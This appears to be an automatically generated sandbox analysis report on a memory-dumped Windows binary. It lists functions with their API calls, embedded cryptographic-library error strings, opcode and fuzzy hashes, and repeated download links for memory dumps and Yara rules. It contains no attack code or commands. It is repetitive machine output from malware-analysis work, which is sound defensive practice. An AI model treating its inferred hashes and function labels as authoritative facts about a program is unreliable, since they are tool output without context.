                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                          • String ID:
                                                          • API String ID: 2791304714-0
                                                          • Opcode ID: 3d9339234f4ec78813fbac3383d69ab6f343f6c9d73337c7be5479a42b2c9f3f
                                                          • Instruction ID: a3316ead2449c12efb95715293424218902dd20328229609133e156377d3f6cd
                                                          • Opcode Fuzzy Hash: 3d9339234f4ec78813fbac3383d69ab6f343f6c9d73337c7be5479a42b2c9f3f
                                                          • Instruction Fuzzy Hash: 8D3117B19007449FC750CF69C480A8AFBF4FB18314F54896EE85A97B41D775F608CB61
                                                          Function 6CF67750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CF67761
                                                          • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CF67782
                                                          • EnterCriticalSection.KERNEL32(00000018), ref: 6CF67796
                                                          • LeaveCriticalSection.KERNEL32(00000018), ref: 6CF677CE
                                                          • QueueUserWorkItem.KERNEL32(6CF81D50,00000000,00000010), ref: 6CF6780C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                          • String ID:
                                                          • API String ID: 584243675-0
                                                          • Opcode ID: a931bc19cbe76eb8bd82b5cbed19d95da5f321fce8384ca25c0d4a7bd0a30ebc
                                                          • Instruction ID: 125b5cc2049f9287aa247d366a457274f19f9db78368a9a36d22e4bc48a969fd
                                                          • Opcode Fuzzy Hash: a931bc19cbe76eb8bd82b5cbed19d95da5f321fce8384ca25c0d4a7bd0a30ebc
                                                          • Instruction Fuzzy Hash: 99217F72551209AFCB40CF65C944B9BBBF8FB45304F10895AE45687E50D730FA48CBA0
                                                          Function 6CF55AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::exception::exception.LIBCMT ref: 6CF55ACB
                                                            • Part of subcall function 6CFB9533: std::exception::_Copy_str.LIBCMT ref: 6CFB954E
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF55ABC
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF55AE0
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF55B18
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF55B2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                          • String ID:
                                                          • API String ID: 921928366-0
                                                          • Opcode ID: 9ebfa0d674890f2ab3b192769f7331b27f0561ce034f8cd99a693fa21928b369
                                                          • Instruction ID: cf1b2e532aec7bd55afc0abedcb2a38e0902072752405e3c8e4c0a075063eace
                                                          • Opcode Fuzzy Hash: 9ebfa0d674890f2ab3b192769f7331b27f0561ce034f8cd99a693fa21928b369
                                                          • Instruction Fuzzy Hash: 510121B28102087BDB04DFA5D845DDE77B8AF24344F448159E905A7A10EB30EB088BA1
                                                          Function 6CFBF03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • __getptd.LIBCMT ref: 6CFBF047
                                                            • Part of subcall function 6CFBEAE6: __getptd_noexit.LIBCMT ref: 6CFBEAE9
                                                            • Part of subcall function 6CFBEAE6: __amsg_exit.LIBCMT ref: 6CFBEAF6
                                                          • __amsg_exit.LIBCMT ref: 6CFBF067
                                                          • __lock.LIBCMT ref: 6CFBF077
                                                          • InterlockedDecrement.KERNEL32(?), ref: 6CFBF094
                                                          • InterlockedIncrement.KERNEL32(060A1658), ref: 6CFBF0BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                          • String ID:
                                                          • API String ID: 4271482742-0
                                                          • Opcode ID: 273aab083b417148ab44a89472341b0b0624b9c3f396ff7a991d8b13f9aae5c8
                                                          • Instruction ID: 5f09728da391f5de889a7188c067a4ab993af94aaf9cc721365fb83b64d68277
                                                          • Opcode Fuzzy Hash: 273aab083b417148ab44a89472341b0b0624b9c3f396ff7a991d8b13f9aae5c8
                                                          • Instruction Fuzzy Hash: 6101CC7AE02611ABCB90AF6784047DE7B78BF05798F114005E824B3FA4CB34A945CBE2
                                                          Function 6CFBF7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • __getptd.LIBCMT ref: 6CFBF7C8
                                                            • Part of subcall function 6CFBEAE6: __getptd_noexit.LIBCMT ref: 6CFBEAE9
                                                            • Part of subcall function 6CFBEAE6: __amsg_exit.LIBCMT ref: 6CFBEAF6
                                                          • __getptd.LIBCMT ref: 6CFBF7DF
                                                          • __amsg_exit.LIBCMT ref: 6CFBF7ED
                                                          • __lock.LIBCMT ref: 6CFBF7FD
                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6CFBF811
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                          • String ID:
                                                          • API String ID: 938513278-0
                                                          • Opcode ID: 05f7602b93b11bb2ac4164c25af0445f48207d169060882445fb40579a3144b1
                                                          • Instruction ID: a9138566eec22b280d3286bae30bb6f1588c949210e1a5862ea2704317b15c8f
                                                          • Opcode Fuzzy Hash: 05f7602b93b11bb2ac4164c25af0445f48207d169060882445fb40579a3144b1
                                                          • Instruction Fuzzy Hash: 53F0967AA452049BDBA0ABBB9801BCE76A4AF0072CF314189D45076BC0DB34554486A6
                                                          Function 6CF9E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memcpy_s
                                                          • String ID:
                                                          • API String ID: 2001391462-3916222277
                                                          • Opcode ID: 4da44c69f840903f22eff9f86819451341429ad79157bae5dbd8104a3709f26d
                                                          • Instruction ID: 94f5ce90aa99b328cb639e0b5e020f4cdd426f946eb352e820b0aba35b414387
                                                          • Opcode Fuzzy Hash: 4da44c69f840903f22eff9f86819451341429ad79157bae5dbd8104a3709f26d
                                                          • Instruction Fuzzy Hash: 88C18D756093028FEB44CF29C880A6BB7E1FFC9318F144A2DE595C7650E771EA49CB82
                                                          Function 6CFB8B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memcpy_s_memmove_memset
                                                          • String ID: EncodingParameters
                                                          • API String ID: 4034675494-55378216
                                                          • Opcode ID: c3848151504ee9de0fbd19a91bc216747266e94d1cfbe67d4e07921ee11a0144
                                                          • Instruction ID: 26542c7d075493215e04ed38687afab391cf8f04db5a0925d0d445debda12f61
                                                          • Opcode Fuzzy Hash: c3848151504ee9de0fbd19a91bc216747266e94d1cfbe67d4e07921ee11a0144
                                                          • Instruction Fuzzy Hash: 469179B16093829FD700CF29C880B5BBBE5AFDA708F144A1EF89897351D771E945CB92
                                                          Function 6CF91200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFAD820: _memmove.LIBCMT ref: 6CFAD930
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF913D4
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CF88D80: _malloc.LIBCMT ref: 6CF88D8A
                                                            • Part of subcall function 6CF88D80: _malloc.LIBCMT ref: 6CF88DAF
                                                          Strings
                                                          • : ciphertext length of , xrefs: 6CF912E4
                                                          • doesn't match the required length of , xrefs: 6CF91316
                                                          • for this key, xrefs: 6CF91348
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                          • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                                          • API String ID: 1025790555-2559040249
                                                          • Opcode ID: 54d08fa19c13523a129508ac349e1ddf22e2343f64c575eb9701a2784b9bcc24
                                                          • Instruction ID: bfe7a7cf71eee36650b368659859c464d2fc3801c1b8b0ea3da0b699215dccd2
                                                          • Opcode Fuzzy Hash: 54d08fa19c13523a129508ac349e1ddf22e2343f64c575eb9701a2784b9bcc24
                                                          • Instruction Fuzzy Hash: D4A15E755083809FD324DB69D880BDBF7E9AFD9304F548A1DE19983750EB70A909CBA3
                                                          Function 6CFBB47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 6CFBB50D
                                                            • Part of subcall function 6CFC1AA0: __87except.LIBCMT ref: 6CFC1ADB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: f90c9fd14ceaced802335ecc633b73c03251a918473e0e23cffb62439f0717f4
                                                          • Instruction ID: faf35cd38fbc4f518df4f4928425e4dd84171454d850ea8444bb111c18b34a34
                                                          • Opcode Fuzzy Hash: f90c9fd14ceaced802335ecc633b73c03251a918473e0e23cffb62439f0717f4
                                                          • Instruction Fuzzy Hash: 7D514E71F1D107C6C701AB16CA903AB7BB4DB41719F20CE58E4E552A98EB34C8A58F47
                                                          Function 6CF68560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __cftoe.LIBCMT ref: 6CF688ED
                                                            • Part of subcall function 6CFBA116: __mbstowcs_s_l.LIBCMT ref: 6CFBA12C
                                                          • __cftoe.LIBCMT ref: 6CF68911
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __cftoe$__mbstowcs_s_l
                                                          • String ID: zX$P
                                                          • API String ID: 1494777130-2079734279
                                                          • Opcode ID: a72546a8b8371549d9c13d63a9efbd05ec8c45f3eeb227a7301b027797be6f14
                                                          • Instruction ID: b471921e068fbb5e40f6a9e283a8df490c9b65c39daedbcae7858353c7c7c60d
                                                          • Opcode Fuzzy Hash: a72546a8b8371549d9c13d63a9efbd05ec8c45f3eeb227a7301b027797be6f14
                                                          • Instruction Fuzzy Hash: 8F910FB11087819FC376CF15C880BEBBBE8BB88714F508A1DE19D4B290DB716605CF92
                                                          Function 6CF889D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF88ABB
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF88B82
                                                          Strings
                                                          • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CF88A8E
                                                          • : invalid ciphertext, xrefs: 6CF88B48
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                                          • API String ID: 2005118841-483996327
                                                          • Opcode ID: 631a5ac0abce64007ea80b8a2b02b95aa792b0fd3466da10f4c79d550eba41b6
                                                          • Instruction ID: dad59b167842c099d89f5cc8017284e7acee9e085771a3bdb0faf6c5e1e9f1e0
                                                          • Opcode Fuzzy Hash: 631a5ac0abce64007ea80b8a2b02b95aa792b0fd3466da10f4c79d550eba41b6
                                                          • Instruction Fuzzy Hash: 28512BB5104740AFD324CF54D890EABB7F8EF99708F108A1DE59A97B50DB31E909CB62
                                                          Function 6CF86B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF86BA6
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CF54010: _memmove.LIBCMT ref: 6CF540C8
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF86C56
                                                          Strings
                                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CF86BE3
                                                          • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CF86B33
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                          • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
                                                          • API String ID: 1902190269-184618050
                                                          • Opcode ID: b7009567057c936fd797d40255d0bf27f8d252cbbb6385af108b9c5c734b972c
                                                          • Instruction ID: 4ef1f0c8e943931c0d956aed0c94d319bf5d6fd67a1cb71302526294ebeb3287
                                                          • Opcode Fuzzy Hash: b7009567057c936fd797d40255d0bf27f8d252cbbb6385af108b9c5c734b972c
                                                          • Instruction Fuzzy Hash: 715139B1618380AFC310DF29C880A5BFBF8BB99754F504A1DF5A593790D7B5E908CB52
                                                          Function 6CF54E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54EFC
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54F16
                                                          • _memmove.LIBCMT ref: 6CF54F6C
                                                            • Part of subcall function 6CF54D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF54DA9
                                                            • Part of subcall function 6CF54D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF54DCA
                                                            • Part of subcall function 6CF54D90: std::_Xinvalid_argument.LIBCPMT ref: 6CF54DE5
                                                            • Part of subcall function 6CF54D90: _memmove.LIBCMT ref: 6CF54E4D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
